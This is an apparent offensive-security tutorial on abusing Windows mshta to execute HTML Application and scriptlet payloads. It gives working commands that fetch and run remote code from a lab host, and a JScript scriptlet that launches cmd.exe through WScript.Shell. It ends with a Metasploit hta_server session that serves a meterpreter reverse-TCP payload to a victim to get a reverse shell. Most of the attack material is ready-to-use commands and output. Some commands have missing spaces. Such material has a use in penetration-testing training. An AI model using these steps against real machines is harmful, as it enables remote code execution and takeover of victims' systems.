HTA stands for “HTML Application.” It allows you to create a downloadable file that takes all the information regarding how it is displayed and rendered. HTML Applications, also known as HTAs, which are dynamic HTML pages containing JScript and VBScript. The LOLBINS (Living-of-the-land Binaries) tool mshta is used to execute HTA files. It can be executed by itself or automatically from Internet Explorer.
Practice
In the following example, we will use an ActiveXObject in our payload as proof of concept to execute cmd.exe. Consider the following HTML code.
We can now execute the script on the target machine
mshta.exehttp://10.0.0.5/m.hta
Writing a scriptlet file that will launch cmd.exe when invoked:
#http://10.0.0.5/m.sct<?XML version="1.0"?><scriptlet><registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>
<public><methodname="Exec"></method></public><script language="JScript"><![CDATA[ function Exec() { var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); }]]></script></scriptlet>
We can now execute the script on the target machine
# from powershell/cmd/cmshta.exejavascript:a=(GetObject("script:http://10.0.0.5/m.sct")).Exec();close();
We can use the msfvenom framework to generate hta files.
We can now execute the script on the target machine
mshta.exehttp://10.0.0.5/m.hta
We can use the metasploit framework to generate hta files and directly serv it throught our webserver.
msf6>useexploit/windows/misc/hta_servermsf6exploit(windows/misc/hta_server) >setLHOST10.8.232.37LHOST =>10.8.232.37msf6exploit(windows/misc/hta_server) >setLPORT443LPORT =>443msf6exploit(windows/misc/hta_server) >setSRVHOST10.8.232.37SRVHOST =>10.8.232.37msf6exploit(windows/misc/hta_server) >setpayloadwindows/meterpreter/reverse_tcppayload =>windows/meterpreter/reverse_tcpmsf6exploit(windows/misc/hta_server) >exploit[*] Exploit running as background job 0.[*] Exploit completed, but no session was created.msf6exploit(windows/misc/hta_server) >[*] Started reverse TCP handler on 10.8.232.37:443[*] Using URL: http://10.8.232.37:8080/TkWV9zkd.hta[*] Server started.
On the victim machine, once we visit the malicious HTA file that was provided as a URL by Metasploit, we should receive a reverse connection.
